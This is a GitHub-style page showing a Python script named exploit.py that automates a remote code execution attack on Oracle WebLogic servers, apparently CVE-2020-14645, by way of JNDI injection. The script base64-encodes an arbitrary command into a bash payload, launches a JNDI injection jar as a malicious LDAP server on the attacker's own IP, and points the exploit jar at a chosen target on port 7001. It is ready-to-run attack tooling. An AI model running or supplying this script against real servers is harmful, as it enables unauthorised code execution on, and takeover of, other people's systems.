-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
executable file
·71 lines (49 loc) · 1.66 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#! /usr/bin/python3
import base64
import pexpect
import re
import time
import argparse
import socket
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', action='store', dest='target', help='your target')
parser.add_argument('-c', '--cmd', action='store', dest='command', help='the command')
args = parser.parse_args()
def get_network_ip():
"""get the local network ip, not loopback 127.*"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('192.168.254.5',80))
ip = s.getsockname()[0]
s.close()
return ip
local_ipaddr = get_network_ip()
def set_payload(cmd:str):
payload = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
java_payload = 'java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \'' + payload + '\' -A ' + local_ipaddr
print(java_payload)
return java_payload
def get_url(pool:str):
url_pool = re.findall(r':1389/[\S]{6}',pool)
print(url_pool)
return url_pool
def set_idap(target, command):
payload = set_payload(command)
handler = pexpect.spawn(payload)
try:
handler.expect(pexpect.EOF,timeout=2)
except:
pass
result = handler.before.decode()
print(result)
time.sleep(20)
print(type(result))
url_list = list(map(lambda x:local_ipaddr + x, get_url(result)))
print(url_list)
for i in url_list:
print("java -jar CVE-2020-14645.jar " + i + " http://" + args.target + ":7001")
exp_handler = pexpect.spawn("java -jar CVE-2020-14645.jar " + i + " http://" + args.target + ":7001")
time.sleep(2)
exp_handler.expect('logic', timeout=2)
print(exp_handler.read().decode().strip())
if __name__ == '__main__':
set_idap(args.target, args.command)